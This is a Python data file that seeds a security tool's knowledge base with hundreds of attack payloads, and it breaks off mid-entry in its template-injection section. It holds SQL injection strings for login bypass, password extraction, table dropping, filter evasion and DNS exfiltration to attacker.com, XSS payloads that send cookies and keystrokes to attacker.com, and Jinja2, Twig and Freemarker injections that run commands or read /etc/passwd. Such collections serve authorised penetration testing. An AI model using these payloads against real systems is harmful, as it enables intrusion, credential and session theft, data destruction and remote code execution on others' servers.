"""Security Payload Seeds for NumaSec Knowledge Base.

500+ payloads organized by category:
- SQL Injection (authentication bypass, union, blind, etc.)
- XSS (reflected, stored, DOM, filter bypass)
- SSTI (Jinja2, Twig, Freemarker, etc.)
- LFI/RFI (Local/Remote File Inclusion)
- Command Injection (OS command injection)
- XXE (XML External Entity)
- SSRF (Server-Side Request Forgery)
- NoSQL Injection
- LDAP Injection
- XPath Injection
- JWT Attacks
- Path Traversal
- Header Injection
- Open Redirect
- CRLF Injection
- Deserialization
"""

from __future__ import annotations

from numasec.knowledge.store import (
    PayloadEntry,
    generate_payload_id,
    PayloadCategory,
)


# ============================================================================
# SQL Injection Payloads
# ============================================================================

SQLI_PAYLOADS = [
    # Authentication Bypass
    PayloadEntry(
        id=generate_payload_id("sqli", "auth_bypass_or_1"),
        name="Basic OR 1=1 Bypass",
        category="sqli",
        payload="' OR '1'='1",
        description="Classic authentication bypass using OR condition",
        use_case="Login forms with simple SQL concatenation",
        bypass_technique=None,
        context="body",
        tags=["auth-bypass", "login", "basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "auth_bypass_or_true"),
        name="OR TRUE Bypass",
        category="sqli",
        payload="' OR TRUE--",
        description="Authentication bypass using boolean TRUE",
        use_case="Login forms that accept boolean values",
        bypass_technique=None,
        context="body",
        tags=["auth-bypass", "login", "boolean"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "auth_bypass_comment"),
        name="Comment-based Bypass",
        category="sqli",
        payload="admin'--",
        description="Bypass password check by commenting out rest of query",
        use_case="Login forms where username is checked first",
        bypass_technique=None,
        context="body",
        tags=["auth-bypass", "login", "comment"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "auth_bypass_admin"),
        name="Admin User Bypass",
        category="sqli",
        payload="' OR username='admin'--",
        description="Target specific admin user",
        use_case="When admin username is known",
        bypass_technique=None,
        context="body",
        tags=["auth-bypass", "login", "admin"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "auth_bypass_null"),
        name="NULL Byte Bypass",
        category="sqli",
        payload="admin'%00",
        description="Use null byte to terminate string",
        use_case="Languages that handle null bytes differently",
        bypass_technique="null-byte",
        context="body",
        tags=["auth-bypass", "null-byte"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "auth_bypass_union_null"),
        name="UNION NULL Bypass",
        category="sqli",
        payload="' UNION SELECT NULL,NULL,NULL--",
        description="UNION-based bypass with NULL columns",
        use_case="When column count matches",
        bypass_technique=None,
        context="body",
        tags=["auth-bypass", "union"],
    ),
    
    # UNION-based SQLi
    PayloadEntry(
        id=generate_payload_id("sqli", "union_column_count"),
        name="UNION Column Count Detection",
        category="sqli",
        payload="' UNION SELECT NULL,NULL,NULL-- (increment NULLs)",
        description="Detect number of columns for UNION attack",
        use_case="First step in UNION-based extraction",
        bypass_technique=None,
        context="url",
        tags=["union", "enumeration"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "union_string_detect"),
        name="UNION String Column Detection",
        category="sqli",
        payload="' UNION SELECT 'a',NULL,NULL--",
        description="Find columns that accept string data",
        use_case="Identify where to place extracted data",
        bypass_technique=None,
        context="url",
        tags=["union", "enumeration"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "union_db_version"),
        name="UNION Extract DB Version",
        category="sqli",
        payload="' UNION SELECT @@version,NULL,NULL--",
        description="Extract MySQL/MSSQL version",
        use_case="Database fingerprinting",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["union", "fingerprint", "mysql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "union_db_version_pg"),
        name="UNION Extract PostgreSQL Version",
        category="sqli",
        payload="' UNION SELECT version(),NULL,NULL--",
        description="Extract PostgreSQL version",
        use_case="Database fingerprinting",
        bypass_technique=None,
        platform="postgresql",
        context="url",
        tags=["union", "fingerprint", "postgresql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "union_tables"),
        name="UNION Extract Table Names",
        category="sqli",
        payload="' UNION SELECT table_name,NULL FROM information_schema.tables--",
        description="List all tables in database",
        use_case="Database enumeration",
        bypass_technique=None,
        context="url",
        tags=["union", "enumeration"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "union_columns"),
        name="UNION Extract Column Names",
        category="sqli",
        payload="' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--",
        description="List columns in a table",
        use_case="Table structure enumeration",
        bypass_technique=None,
        context="url",
        tags=["union", "enumeration"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "union_data_extract"),
        name="UNION Extract User Data",
        category="sqli",
        payload="' UNION SELECT username,password FROM users--",
        description="Extract username and password",
        use_case="Data exfiltration",
        bypass_technique=None,
        context="url",
        tags=["union", "exfiltration"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "union_concat"),
        name="UNION with CONCAT",
        category="sqli",
        payload="' UNION SELECT CONCAT(username,':',password),NULL FROM users--",
        description="Combine multiple columns",
        use_case="When only one column displays output",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["union", "concat"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "union_group_concat"),
        name="UNION with GROUP_CONCAT",
        category="sqli",
        payload="' UNION SELECT GROUP_CONCAT(username,0x3a,password),NULL FROM users--",
        description="Extract all rows in single result",
        use_case="When only one row is returned",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["union", "group-concat"],
    ),
    
    # Blind SQLi - Boolean-based
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_bool_true"),
        name="Boolean Blind - True Condition",
        category="sqli",
        payload="' AND 1=1--",
        description="True condition for comparison",
        use_case="Baseline for boolean blind testing",
        bypass_technique=None,
        context="url",
        tags=["blind", "boolean"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_bool_false"),
        name="Boolean Blind - False Condition",
        category="sqli",
        payload="' AND 1=2--",
        description="False condition for comparison",
        use_case="Compare response with true condition",
        bypass_technique=None,
        context="url",
        tags=["blind", "boolean"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_bool_substr"),
        name="Boolean Blind - SUBSTR Extraction",
        category="sqli",
        payload="' AND SUBSTR(username,1,1)='a'--",
        description="Extract characters one by one",
        use_case="Character-by-character data extraction",
        bypass_technique=None,
        context="url",
        tags=["blind", "boolean", "extraction"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_bool_ascii"),
        name="Boolean Blind - ASCII Extraction",
        category="sqli",
        payload="' AND ASCII(SUBSTR(password,1,1))>97--",
        description="Binary search with ASCII values",
        use_case="Faster extraction with binary search",
        bypass_technique=None,
        context="url",
        tags=["blind", "boolean", "extraction"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_bool_length"),
        name="Boolean Blind - Length Detection",
        category="sqli",
        payload="' AND LENGTH(password)>10--",
        description="Determine string length",
        use_case="Before character extraction",
        bypass_technique=None,
        context="url",
        tags=["blind", "boolean", "enumeration"],
    ),
    
    # Blind SQLi - Time-based
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_time_sleep"),
        name="Time-based Blind - SLEEP",
        category="sqli",
        payload="' AND SLEEP(5)--",
        description="MySQL time delay",
        use_case="Confirm SQL injection exists",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["blind", "time-based"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_time_benchmark"),
        name="Time-based Blind - BENCHMARK",
        category="sqli",
        payload="' AND BENCHMARK(10000000,SHA1('test'))--",
        description="CPU-intensive operation delay",
        use_case="When SLEEP is blocked",
        bypass_technique="benchmark",
        platform="mysql",
        context="url",
        tags=["blind", "time-based"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_time_pg"),
        name="Time-based Blind - PostgreSQL",
        category="sqli",
        payload="'; SELECT pg_sleep(5)--",
        description="PostgreSQL time delay",
        use_case="Confirm PostgreSQL injection",
        bypass_technique=None,
        platform="postgresql",
        context="url",
        tags=["blind", "time-based", "postgresql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_time_mssql"),
        name="Time-based Blind - MSSQL",
        category="sqli",
        payload="'; WAITFOR DELAY '0:0:5'--",
        description="MSSQL time delay",
        use_case="Confirm MSSQL injection",
        bypass_technique=None,
        platform="mssql",
        context="url",
        tags=["blind", "time-based", "mssql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "blind_time_conditional"),
        name="Time-based Blind - Conditional",
        category="sqli",
        payload="' AND IF(1=1,SLEEP(5),0)--",
        description="Conditional time delay",
        use_case="Data extraction via timing",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["blind", "time-based", "conditional"],
    ),
    
    # Error-based SQLi
    PayloadEntry(
        id=generate_payload_id("sqli", "error_extractvalue"),
        name="Error-based - EXTRACTVALUE",
        category="sqli",
        payload="' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version),0x7e))--",
        description="Extract data via XML error",
        use_case="Error messages visible",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["error-based", "mysql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "error_updatexml"),
        name="Error-based - UPDATEXML",
        category="sqli",
        payload="' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1)--",
        description="Extract data via UPDATEXML error",
        use_case="Alternative to EXTRACTVALUE",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["error-based", "mysql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "error_double_query"),
        name="Error-based - Double Query",
        category="sqli",
        payload="' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT user()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
        description="Double query error injection",
        use_case="MySQL error-based extraction",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["error-based", "mysql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "error_cast"),
        name="Error-based - CAST Error",
        category="sqli",
        payload="' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--",
        description="Type conversion error",
        use_case="MSSQL error-based",
        bypass_technique=None,
        platform="mssql",
        context="url",
        tags=["error-based", "mssql"],
    ),
    
    # Stacked Queries
    PayloadEntry(
        id=generate_payload_id("sqli", "stacked_insert"),
        name="Stacked Query - INSERT",
        category="sqli",
        payload="'; INSERT INTO users VALUES('hacker','hacked')--",
        description="Insert new record via stacked query",
        use_case="When stacked queries supported",
        bypass_technique=None,
        context="body",
        tags=["stacked", "write"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "stacked_update"),
        name="Stacked Query - UPDATE",
        category="sqli",
        payload="'; UPDATE users SET password='hacked' WHERE username='admin'--",
        description="Modify existing record",
        use_case="Change admin password",
        bypass_technique=None,
        context="body",
        tags=["stacked", "write"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "stacked_drop"),
        name="Stacked Query - DROP TABLE",
        category="sqli",
        payload="'; DROP TABLE users--",
        description="Delete entire table (destructive!)",
        use_case="Proof of impact (with permission)",
        bypass_technique=None,
        context="body",
        tags=["stacked", "destructive"],
    ),
    
    # WAF Bypass Techniques
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_case"),
        name="WAF Bypass - Case Variation",
        category="sqli",
        payload="' oR '1'='1",
        description="Mixed case to bypass keyword filters",
        use_case="Basic WAF bypass",
        bypass_technique="case-variation",
        context="url",
        tags=["waf-bypass", "basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_comment"),
        name="WAF Bypass - Inline Comments",
        category="sqli",
        payload="' /*!50000OR*/ '1'='1",
        description="MySQL version comments",
        use_case="MySQL-specific WAF bypass",
        bypass_technique="inline-comments",
        platform="mysql",
        context="url",
        tags=["waf-bypass", "mysql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_whitespace"),
        name="WAF Bypass - Alternative Whitespace",
        category="sqli",
        payload="'%09OR%09'1'='1",
        description="Tab instead of space",
        use_case="When space is blocked",
        bypass_technique="whitespace",
        context="url",
        tags=["waf-bypass", "whitespace"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_url_encode"),
        name="WAF Bypass - URL Encoding",
        category="sqli",
        payload="%27%20OR%20%271%27%3D%271",
        description="URL encode special characters",
        use_case="Bypass basic input filters",
        bypass_technique="url-encoding",
        context="url",
        tags=["waf-bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_double_encode"),
        name="WAF Bypass - Double URL Encoding",
        category="sqli",
        payload="%2527%2520OR%2520%25271%2527%253D%25271",
        description="Double URL encoding",
        use_case="Bypass single-pass decoding",
        bypass_technique="double-encoding",
        context="url",
        tags=["waf-bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_hex"),
        name="WAF Bypass - Hex Encoding",
        category="sqli",
        payload="' OR 0x31=0x31--",
        description="Hex values instead of strings",
        use_case="Bypass string filters",
        bypass_technique="hex-encoding",
        context="url",
        tags=["waf-bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_no_quotes"),
        name="WAF Bypass - No Quotes",
        category="sqli",
        payload="1 OR 1=1",
        description="Numeric injection without quotes",
        use_case="Numeric parameter injection",
        bypass_technique="no-quotes",
        context="url",
        tags=["waf-bypass", "numeric"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_scientific"),
        name="WAF Bypass - Scientific Notation",
        category="sqli",
        payload="1e0 OR 1e0=1e0",
        description="Scientific notation for numbers",
        use_case="Bypass numeric filters",
        bypass_technique="scientific",
        context="url",
        tags=["waf-bypass", "numeric"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "bypass_buffer_overflow"),
        name="WAF Bypass - Buffer Overflow",
        category="sqli",
        payload="' OR 1=1--" + "A" * 5000,
        description="Overflow WAF buffer",
        use_case="WAFs with size limits",
        bypass_technique="buffer-overflow",
        context="body",
        tags=["waf-bypass", "buffer"],
    ),
    
    # Second Order SQLi
    PayloadEntry(
        id=generate_payload_id("sqli", "second_order"),
        name="Second Order - Registration",
        category="sqli",
        payload="admin'-- (as username during registration)",
        description="Stored payload for later execution",
        use_case="Registration/profile update",
        bypass_technique=None,
        context="body",
        tags=["second-order", "stored"],
    ),
    
    # Out-of-Band SQLi
    PayloadEntry(
        id=generate_payload_id("sqli", "oob_dns_mysql"),
        name="OOB - DNS Exfiltration MySQL",
        category="sqli",
        payload="' UNION SELECT LOAD_FILE(CONCAT('\\\\\\\\',@@version,'.attacker.com\\\\a'))--",
        description="DNS exfiltration via LOAD_FILE",
        use_case="Blind SQLi with no visible output",
        bypass_technique=None,
        platform="mysql",
        context="url",
        tags=["oob", "dns", "mysql"],
    ),
    PayloadEntry(
        id=generate_payload_id("sqli", "oob_dns_mssql"),
        name="OOB - DNS Exfiltration MSSQL",
        category="sqli",
        payload="'; EXEC master..xp_dirtree '\\\\' + @@version + '.attacker.com\\a'--",
        description="DNS exfiltration via xp_dirtree",
        use_case="MSSQL OOB exfiltration",
        bypass_technique=None,
        platform="mssql",
        context="url",
        tags=["oob", "dns", "mssql"],
    ),
]


# ============================================================================
# XSS Payloads
# ============================================================================

XSS_PAYLOADS = [
    # Basic XSS
    PayloadEntry(
        id=generate_payload_id("xss", "basic_script"),
        name="Basic Script Tag",
        category="xss",
        payload="<script>alert('XSS')</script>",
        description="Classic XSS with script tag",
        use_case="Testing for basic XSS",
        bypass_technique=None,
        context="body",
        tags=["reflected", "basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "basic_img"),
        name="IMG Tag onerror",
        category="xss",
        payload='<img src=x onerror=alert("XSS")>',
        description="XSS via broken image",
        use_case="When script tag is filtered",
        bypass_technique="event-handler",
        context="body",
        tags=["reflected", "event-handler"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "basic_svg"),
        name="SVG onload",
        category="xss",
        payload='<svg onload=alert("XSS")>',
        description="XSS via SVG element",
        use_case="Alternative to img/script",
        bypass_technique="event-handler",
        context="body",
        tags=["reflected", "event-handler"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "basic_body"),
        name="Body onload",
        category="xss",
        payload='<body onload=alert("XSS")>',
        description="XSS via body element",
        use_case="Full page injection",
        bypass_technique="event-handler",
        context="body",
        tags=["reflected", "event-handler"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "basic_input"),
        name="Input onfocus",
        category="xss",
        payload='<input onfocus=alert("XSS") autofocus>',
        description="Auto-triggering input XSS",
        use_case="Form injection context",
        bypass_technique="event-handler",
        context="body",
        tags=["reflected", "event-handler"],
    ),
    
    # Attribute Injection
    PayloadEntry(
        id=generate_payload_id("xss", "attr_onclick"),
        name="Attribute - onclick",
        category="xss",
        payload='" onclick="alert(\'XSS\')" x="',
        description="Inject onclick event",
        use_case="Inside HTML attribute",
        bypass_technique=None,
        context="attribute",
        tags=["reflected", "attribute"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "attr_onmouseover"),
        name="Attribute - onmouseover",
        category="xss",
        payload='" onmouseover="alert(\'XSS\')" x="',
        description="Inject onmouseover event",
        use_case="Hover-triggered XSS",
        bypass_technique=None,
        context="attribute",
        tags=["reflected", "attribute"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "attr_break_href"),
        name="Attribute - Break href",
        category="xss",
        payload='javascript:alert("XSS")',
        description="JavaScript protocol in href",
        use_case="Link injection",
        bypass_technique=None,
        context="attribute",
        tags=["reflected", "javascript-protocol"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "attr_break_style"),
        name="Attribute - Style Expression",
        category="xss",
        payload='style="background:url(javascript:alert(\'XSS\'))"',
        description="CSS expression XSS",
        use_case="Older browsers/IE",
        bypass_technique=None,
        context="attribute",
        tags=["reflected", "css"],
    ),
    
    # DOM-based XSS
    PayloadEntry(
        id=generate_payload_id("xss", "dom_hash"),
        name="DOM - Location Hash",
        category="xss",
        payload="#<script>alert('XSS')</script>",
        description="XSS via URL fragment",
        use_case="Client-side fragment handling",
        bypass_technique=None,
        context="url",
        tags=["dom", "fragment"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "dom_innerhtml"),
        name="DOM - innerHTML Sink",
        category="xss",
        payload="<img src=x onerror=alert('XSS')>",
        description="Payload for innerHTML sink",
        use_case="document.getElementById().innerHTML",
        bypass_technique=None,
        context="body",
        tags=["dom", "innerhtml"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "dom_document_write"),
        name="DOM - document.write",
        category="xss",
        payload="</title><script>alert('XSS')</script>",
        description="Break out of title for document.write",
        use_case="document.write sink",
        bypass_technique="tag-break",
        context="body",
        tags=["dom", "document-write"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "dom_jquery"),
        name="DOM - jQuery Selector",
        category="xss",
        payload="<img src=x onerror=alert('XSS')>",
        description="XSS via jQuery html()",
        use_case="$('#element').html() sink",
        bypass_technique=None,
        context="body",
        tags=["dom", "jquery"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "dom_postmessage"),
        name="DOM - postMessage",
        category="xss",
        payload='{"type":"html","data":"<img src=x onerror=alert(1)>"}',
        description="XSS via postMessage handler",
        use_case="Insecure message handlers",
        bypass_technique=None,
        context="body",
        tags=["dom", "postmessage"],
    ),
    
    # Filter Bypass
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_case"),
        name="Bypass - Case Variation",
        category="xss",
        payload="<ScRiPt>alert('XSS')</sCrIpT>",
        description="Mixed case script tag",
        use_case="Case-sensitive filters",
        bypass_technique="case-variation",
        context="body",
        tags=["bypass", "case"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_encoding_html"),
        name="Bypass - HTML Entity Encoding",
        category="xss",
        payload="&lt;script&gt;alert('XSS')&lt;/script&gt;",
        description="HTML entity encoded (decoded by browser)",
        use_case="Double decode scenarios",
        bypass_technique="html-entities",
        context="body",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_encoding_url"),
        name="Bypass - URL Encoding",
        category="xss",
        payload="%3Cscript%3Ealert('XSS')%3C/script%3E",
        description="URL encoded payload",
        use_case="URL parameter injection",
        bypass_technique="url-encoding",
        context="url",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_encoding_unicode"),
        name="Bypass - Unicode Encoding",
        category="xss",
        payload="\\u003cscript\\u003ealert('XSS')\\u003c/script\\u003e",
        description="Unicode escaped payload",
        use_case="JavaScript context",
        bypass_technique="unicode",
        context="body",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_null_byte"),
        name="Bypass - Null Byte",
        category="xss",
        payload="<scr%00ipt>alert('XSS')</script>",
        description="Null byte in tag name",
        use_case="Certain parsers/languages",
        bypass_technique="null-byte",
        context="body",
        tags=["bypass", "null-byte"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_newline"),
        name="Bypass - Newline in Tag",
        category="xss",
        payload="<script\n>alert('XSS')</script>",
        description="Newline character in tag",
        use_case="Regex-based filters",
        bypass_technique="whitespace",
        context="body",
        tags=["bypass", "whitespace"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_double_encoding"),
        name="Bypass - Double Encoding",
        category="xss",
        payload="%253Cscript%253Ealert('XSS')%253C/script%253E",
        description="Double URL encoded",
        use_case="Multiple decode passes",
        bypass_technique="double-encoding",
        context="url",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_backtick"),
        name="Bypass - Backticks",
        category="xss",
        payload="<img src=x onerror=alert`XSS`>",
        description="Template literals instead of parentheses",
        use_case="When () is filtered",
        bypass_technique="backtick",
        context="body",
        tags=["bypass", "syntax"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_svg_onload"),
        name="Bypass - SVG without quotes",
        category="xss",
        payload="<svg/onload=alert('XSS')>",
        description="No space before onload",
        use_case="Space filtering",
        bypass_technique="no-space",
        context="body",
        tags=["bypass", "whitespace"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_construct"),
        name="Bypass - Constructor",
        category="xss",
        payload="<img src=x onerror=[].constructor.constructor('alert(1)')()>",
        description="Construct alert via prototype",
        use_case="Keyword filters",
        bypass_technique="constructor",
        context="body",
        tags=["bypass", "advanced"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "bypass_atob"),
        name="Bypass - Base64 eval",
        category="xss",
        payload='<img src=x onerror=eval(atob("YWxlcnQoMSk="))>',
        description="Base64 encoded alert",
        use_case="Keyword filtering",
        bypass_technique="base64",
        context="body",
        tags=["bypass", "encoding"],
    ),
    
    # Polyglot XSS
    PayloadEntry(
        id=generate_payload_id("xss", "polyglot_1"),
        name="Polyglot XSS #1",
        category="xss",
        payload="javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
        description="Works in multiple contexts",
        use_case="Unknown injection context",
        bypass_technique="polyglot",
        context="body",
        tags=["polyglot", "multi-context"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "polyglot_2"),
        name="Polyglot XSS #2",
        category="xss",
        payload="'\"-->]]>*/</script></style></title><img src=x onerror=alert(1)>",
        description="Context-breaking polyglot",
        use_case="Break multiple contexts",
        bypass_technique="polyglot",
        context="body",
        tags=["polyglot", "multi-context"],
    ),
    
    # Cookie Stealing
    PayloadEntry(
        id=generate_payload_id("xss", "cookie_steal"),
        name="Cookie Exfiltration",
        category="xss",
        payload="<script>new Image().src='http://attacker.com/?c='+document.cookie</script>",
        description="Send cookies to attacker",
        use_case="Session hijacking",
        bypass_technique=None,
        context="body",
        tags=["exfiltration", "cookies"],
    ),
    PayloadEntry(
        id=generate_payload_id("xss", "cookie_steal_fetch"),
        name="Cookie Exfiltration - Fetch",
        category="xss",
        payload="<script>fetch('http://attacker.com/?c='+document.cookie)</script>",
        description="Modern fetch-based exfiltration",
        use_case="Session hijacking",
        bypass_technique=None,
        context="body",
        tags=["exfiltration", "cookies"],
    ),
    
    # Keylogger
    PayloadEntry(
        id=generate_payload_id("xss", "keylogger"),
        name="Keylogger Injection",
        category="xss",
        payload="<script>document.onkeypress=function(e){new Image().src='http://attacker.com/?k='+e.key}</script>",
        description="Log keystrokes to attacker",
        use_case="Credential capture",
        bypass_technique=None,
        context="body",
        tags=["keylogger", "credentials"],
    ),
]


# ============================================================================
# SSTI Payloads
# ============================================================================

SSTI_PAYLOADS = [
    # Detection
    PayloadEntry(
        id=generate_payload_id("ssti", "detect_basic"),
        name="SSTI Detection - Math",
        category="ssti",
        payload="{{7*7}}",
        description="Basic SSTI detection (returns 49)",
        use_case="Initial SSTI testing",
        bypass_technique=None,
        context="body",
        tags=["detection", "basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "detect_multiply"),
        name="SSTI Detection - String",
        category="ssti",
        payload="${{7*7}}",
        description="Alternative syntax (some frameworks)",
        use_case="Initial SSTI testing",
        bypass_technique=None,
        context="body",
        tags=["detection", "basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "detect_jinja"),
        name="SSTI Detection - Jinja2",
        category="ssti",
        payload="{{7*'7'}}",
        description="Jinja2 detection (returns 7777777)",
        use_case="Identify Jinja2 engine",
        bypass_technique=None,
        platform="jinja2",
        context="body",
        tags=["detection", "jinja2"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "detect_twig"),
        name="SSTI Detection - Twig",
        category="ssti",
        payload="{{7*'7'}}",
        description="Twig detection (returns 49)",
        use_case="Identify Twig engine",
        bypass_technique=None,
        platform="twig",
        context="body",
        tags=["detection", "twig"],
    ),
    
    # Jinja2 Exploitation
    PayloadEntry(
        id=generate_payload_id("ssti", "jinja2_rce_1"),
        name="Jinja2 RCE - subprocess",
        category="ssti",
        payload="{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
        description="RCE via os.popen",
        use_case="Jinja2 with config object",
        bypass_technique=None,
        platform="jinja2",
        context="body",
        tags=["rce", "jinja2"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "jinja2_rce_2"),
        name="Jinja2 RCE - MRO Chain",
        category="ssti",
        payload="{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}",
        description="File read via MRO traversal",
        use_case="Jinja2 sandbox escape",
        bypass_technique="mro-chain",
        platform="jinja2",
        context="body",
        tags=["rce", "jinja2", "sandbox-escape"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "jinja2_rce_3"),
        name="Jinja2 RCE - Popen",
        category="ssti",
        payload="""{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='Popen' %}{{ c('id',shell=True,stdout=-1).communicate()[0].strip() }}{% endif %}{% endfor %}""",
        description="RCE via Popen subclass",
        use_case="Jinja2 sandbox escape",
        bypass_technique="subclass-traversal",
        platform="jinja2",
        context="body",
        tags=["rce", "jinja2", "sandbox-escape"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "jinja2_rce_cycler"),
        name="Jinja2 RCE - Cycler",
        category="ssti",
        payload="{{cycler.__init__.__globals__.os.popen('id').read()}}",
        description="RCE via cycler object",
        use_case="When config is not available",
        bypass_technique="cycler",
        platform="jinja2",
        context="body",
        tags=["rce", "jinja2"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "jinja2_rce_lipsum"),
        name="Jinja2 RCE - Lipsum",
        category="ssti",
        payload="{{lipsum.__globals__.os.popen('id').read()}}",
        description="RCE via lipsum globals",
        use_case="Alternative RCE method",
        bypass_technique="lipsum",
        platform="jinja2",
        context="body",
        tags=["rce", "jinja2"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "jinja2_rce_request"),
        name="Jinja2 RCE - Request",
        category="ssti",
        payload="{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
        description="RCE via request object",
        use_case="Flask applications",
        bypass_technique="request-object",
        platform="jinja2",
        context="body",
        tags=["rce", "jinja2", "flask"],
    ),
    
    # Twig Exploitation
    PayloadEntry(
        id=generate_payload_id("ssti", "twig_rce_1"),
        name="Twig RCE - System",
        category="ssti",
        payload="{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}",
        description="RCE via filter callback",
        use_case="Older Twig versions",
        bypass_technique=None,
        platform="twig",
        context="body",
        tags=["rce", "twig"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "twig_rce_2"),
        name="Twig RCE - Passthru",
        category="ssti",
        payload="{{['id']|filter('passthru')}}",
        description="RCE via filter function",
        use_case="Twig with passthru available",
        bypass_technique=None,
        platform="twig",
        context="body",
        tags=["rce", "twig"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "twig_file_read"),
        name="Twig File Read",
        category="ssti",
        payload="{{'/etc/passwd'|file_excerpt(1,30)}}",
        description="Read file contents",
        use_case="Twig with file_excerpt",
        bypass_technique=None,
        platform="twig",
        context="body",
        tags=["file-read", "twig"],
    ),
    
    # Freemarker Exploitation
    PayloadEntry(
        id=generate_payload_id("ssti", "freemarker_rce"),
        name="Freemarker RCE",
        category="ssti",
        payload='<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}',
        description="RCE via Execute class",
        use_case="Freemarker templates",
        bypass_technique=None,
        platform="freemarker",
        context="body",
        tags=["rce", "freemarker"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "freemarker_file_read"),
        name="Freemarker File Read",
        category="ssti",
        payload='${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve("/etc/passwd").toURL().openStream().readAllBytes()?join(" ")}',
        description="File read via reflection",
